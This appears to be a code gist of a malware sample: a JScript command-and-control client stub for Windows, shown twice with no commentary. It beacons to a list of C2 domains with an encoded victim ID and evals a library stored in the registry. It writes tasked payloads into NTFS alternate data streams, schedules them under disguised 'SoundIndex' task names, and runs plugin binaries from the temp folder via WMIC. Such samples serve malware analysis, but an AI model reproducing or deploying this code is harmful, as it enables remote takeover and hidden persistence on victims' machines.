JohnHammond/c2_client_stub.js Secret

## c2_client_stub.js
var client_config = {
  COMMAND_C2 : ['http://redirector.gvt1.com','http://onecs-live.azureedge.net','http://ipm-provider.ff.avast.com','http://tauhutxiga.com','http://monsuperentrepreneur.com','http://tangocation.com','http://e4a24fb0e.com','http://f78efaf43b.com'],
  SOFT_SIG : 'mad24',
  CLIENT_ID : 'E669F102FDFB9C8F2E538C0A8CA3CC29',
  C2_REQUEST_SLEEP : 20,
  C2_FAIL_SLEEP : 1,
  C2_FAIL_COUNT : 3,
  C2_OB_KEY : 'JxTRG4mY',
  SOFT_VERSION : 30,

  C2_COMMAND_PREFIX : 'api.aspx',

  C2_USE_IEXPLORE : false
}

var CLIENT_IMPORT_ENV = true;

var Client = {};
Client.CoMainObject = new ActiveXObject('WScript.Shell');
Client.LoadLibraryReg = function(){
   return Client.CoMainObject.RegRead("HKEY_CURRENT_USER\\Software\\ApplicationContainer\\Appsw64\\WebLib32");
}

Client.LibraryLoadContext = function(){
  eval(Client.LoadLibraryReg());
  Client.Windows = Windows;
  Client.GlobalStrings = GlobalStrings;
  Client.DataTools = DataTools;
  Client.ObjectProducer = ObjectProducer;
  Client.Http = Http;
  Client.Loader = Loader;
  Client.debug = debug;

}


Client.GetWorkerEndpoint = function(){
  var nonce = Client.DataTools.Random.String(12);
  var uid = Client.Loader.GetUid();

  var sessionKey = nonce + client_config.C2_OB_KEY;

  var encodedId = Client.DataTools.RotString(uid, Client.DataTools.DeriveKey(sessionKey), 0);
  encodedId = Base64Encode(encodedId);
  encodedId = encodeURIComponent(encodedId);

  return client_config.C2_COMMAND_PREFIX + "?dx11diag=" + encodedId + "&remote=" + Client.DataTools.Random.String(41) + "&g=" + nonce + "&cdn=281";
}


Client.PrepareExectionTask = function(taskName){
  var currentTime = new Date(),
        hours = currentTime.getHours(),
        minutes = currentTime.getMinutes();

  hours = hours < 10 ? "0" + hours.toString() : hours;
  minutes = (minutes + 3) < 10 ? "0" + (minutes + 1).toString() : (minutes + 1);
  var time = hours + ":" + minutes;

  var path = Client.GlobalStrings.NTFILE_PATH.concat(":").concat(taskName);
  var execCommand = Client.DataTools.Strings.ParseTemplate(Client.GlobalStrings.WMIC_EXEC, "path=".concat(path).concat("&q=w"));
  var taskCommand = Client.DataTools.Strings.ParseTemplate(Client.GlobalStrings.TASK_CREATE, "name=SoundIndex_".concat(taskName).concat("&command=").concat(execCommand).concat("&time=").concat(time))

  Client.Windows.Execute(taskCommand);
}

Client.ExecutePlugin = function(pluginId){
  var hostPath = Client.Windows.GetEnv("%temp%").concat("\\").concat(Client.Loader.GetUid()).concat(".bin");
  var command = Client.DataTools.Strings.ParseTemplate(Client.GlobalStrings.WMIC_EXEC_ARGS, "path=".concat(hostPath).concat("&args=").concat(pluginId));

  Client.Windows.Execute(command);

}


Client.GetTask = function(){
  for(var i = 0; i < client_config.COMMAND_C2.length; i++){
    var response = Client.Http.Request(client_config.COMMAND_C2[i].concat("/").concat(Client.GetWorkerEndpoint()));
    response = Client.DataTools.RotString(response, Client.DataTools.DeriveKey(Client.Loader.GetUid().concat(client_config.C2_OB_KEY)));

    if(response.indexOf("--TASK") !== -1){
        var executionTask = response.replace('--TASK--', '').split('--')[1];
        var taskName = response.split('--')[2];

        Client.PrepareExectionTask(taskName);
        Client.Windows.WriteDataStreamBytes(Client.GlobalStrings.NTFILE_PATH, taskName, Base64bytes(executionTask));
        return;
     }

     if(response.indexOf('--PLUGIN') !== -1){
        var plugin = response.replace('--PLUGIN--', '');
        Client.ExecutePlugin(plugin);
        return;
     }
  }
}


function Base64bytes(string){
  var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
  var element = XmlDOM.createElement("Base64Data");
  element.dataType = "bin.base64";

  element.text = string;

  var stream = WScript.CreateObject("ADODB.Stream");
  stream.Type = 1;
  stream.Open();

  stream.Write(element.nodeTypedValue);
  return stream;
}


function StringToBinary(string){
   var BinaryStream = new ActiveXObject("ADODB.Stream");
   BinaryStream.Type = 2;
   BinaryStream.CharSet = "ascii";
   BinaryStream.Open();
   BinaryStream.WriteText(string);
   BinaryStream.Position = 0;
   BinaryStream.Type = 1;
   BinaryStream.Position = 0;
   return BinaryStream.Read();
}


function Base64Encode(string) {

  var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
  var element = XmlDOM.createElement("Base64Data");
  element.dataType = "bin.base64";

  element.nodeTypedValue = StringToBinary(string);

  return element.text.replace(/\n/g, "").replace(/\/\//g, "");
}

Client.LibraryLoadContext();

WScript.Sleep(1 * 60 * 1000);

Client.GetTask();
	var client_config = {
	COMMAND_C2 : ['http://redirector.gvt1.com','http://onecs-live.azureedge.net','http://ipm-provider.ff.avast.com','http://tauhutxiga.com','http://monsuperentrepreneur.com','http://tangocation.com','http://e4a24fb0e.com','http://f78efaf43b.com'],
	SOFT_SIG : 'mad24',
	CLIENT_ID : 'E669F102FDFB9C8F2E538C0A8CA3CC29',
	C2_REQUEST_SLEEP : 20,
	C2_FAIL_SLEEP : 1,
	C2_FAIL_COUNT : 3,
	C2_OB_KEY : 'JxTRG4mY',
	SOFT_VERSION : 30,

	C2_COMMAND_PREFIX : 'api.aspx',

	C2_USE_IEXPLORE : false
	}

	var CLIENT_IMPORT_ENV = true;

	var Client = {};
	Client.CoMainObject = new ActiveXObject('WScript.Shell');
	Client.LoadLibraryReg = function(){
	return Client.CoMainObject.RegRead("HKEY_CURRENT_USER\\Software\\ApplicationContainer\\Appsw64\\WebLib32");
	}

	Client.LibraryLoadContext = function(){
	eval(Client.LoadLibraryReg());
	Client.Windows = Windows;
	Client.GlobalStrings = GlobalStrings;
	Client.DataTools = DataTools;
	Client.ObjectProducer = ObjectProducer;
	Client.Http = Http;
	Client.Loader = Loader;
	Client.debug = debug;

	}


	Client.GetWorkerEndpoint = function(){
	var nonce = Client.DataTools.Random.String(12);
	var uid = Client.Loader.GetUid();

	var sessionKey = nonce + client_config.C2_OB_KEY;

	var encodedId = Client.DataTools.RotString(uid, Client.DataTools.DeriveKey(sessionKey), 0);
	encodedId = Base64Encode(encodedId);
	encodedId = encodeURIComponent(encodedId);

	return client_config.C2_COMMAND_PREFIX + "?dx11diag=" + encodedId + "&remote=" + Client.DataTools.Random.String(41) + "&g=" + nonce + "&cdn=281";
	}


	Client.PrepareExectionTask = function(taskName){
	var currentTime = new Date(),
	hours = currentTime.getHours(),
	minutes = currentTime.getMinutes();

	hours = hours < 10 ? "0" + hours.toString() : hours;
	minutes = (minutes + 3) < 10 ? "0" + (minutes + 1).toString() : (minutes + 1);
	var time = hours + ":" + minutes;

	var path = Client.GlobalStrings.NTFILE_PATH.concat(":").concat(taskName);
	var execCommand = Client.DataTools.Strings.ParseTemplate(Client.GlobalStrings.WMIC_EXEC, "path=".concat(path).concat("&q=w"));
	var taskCommand = Client.DataTools.Strings.ParseTemplate(Client.GlobalStrings.TASK_CREATE, "name=SoundIndex_".concat(taskName).concat("&command=").concat(execCommand).concat("&time=").concat(time))

	Client.Windows.Execute(taskCommand);
	}

	Client.ExecutePlugin = function(pluginId){
	var hostPath = Client.Windows.GetEnv("%temp%").concat("\\").concat(Client.Loader.GetUid()).concat(".bin");
	var command = Client.DataTools.Strings.ParseTemplate(Client.GlobalStrings.WMIC_EXEC_ARGS, "path=".concat(hostPath).concat("&args=").concat(pluginId));

	Client.Windows.Execute(command);

	}


	Client.GetTask = function(){
	for(var i = 0; i < client_config.COMMAND_C2.length; i++){
	var response = Client.Http.Request(client_config.COMMAND_C2[i].concat("/").concat(Client.GetWorkerEndpoint()));
	response = Client.DataTools.RotString(response, Client.DataTools.DeriveKey(Client.Loader.GetUid().concat(client_config.C2_OB_KEY)));

	if(response.indexOf("--TASK") !== -1){
	var executionTask = response.replace('--TASK--', '').split('--')[1];
	var taskName = response.split('--')[2];

	Client.PrepareExectionTask(taskName);
	Client.Windows.WriteDataStreamBytes(Client.GlobalStrings.NTFILE_PATH, taskName, Base64bytes(executionTask));
	return;
	}

	if(response.indexOf('--PLUGIN') !== -1){
	var plugin = response.replace('--PLUGIN--', '');
	Client.ExecutePlugin(plugin);
	return;
	}
	}
	}



	function Base64bytes(string){
	var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
	var element = XmlDOM.createElement("Base64Data");
	element.dataType = "bin.base64";

	element.text = string;

	var stream = WScript.CreateObject("ADODB.Stream");
	stream.Type = 1;
	stream.Open();

	stream.Write(element.nodeTypedValue);
	return stream;
	}


	function StringToBinary(string){
	var BinaryStream = new ActiveXObject("ADODB.Stream");
	BinaryStream.Type = 2;
	BinaryStream.CharSet = "ascii";
	BinaryStream.Open();
	BinaryStream.WriteText(string);
	BinaryStream.Position = 0;
	BinaryStream.Type = 1;
	BinaryStream.Position = 0;
	return BinaryStream.Read();
	}


	function Base64Encode(string) {

	var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
	var element = XmlDOM.createElement("Base64Data");
	element.dataType = "bin.base64";

	element.nodeTypedValue = StringToBinary(string);

	return element.text.replace(/\n/g, "").replace(/\/\//g, "");
	}

	Client.LibraryLoadContext();

	WScript.Sleep(1 * 60 * 1000);

	Client.GetTask();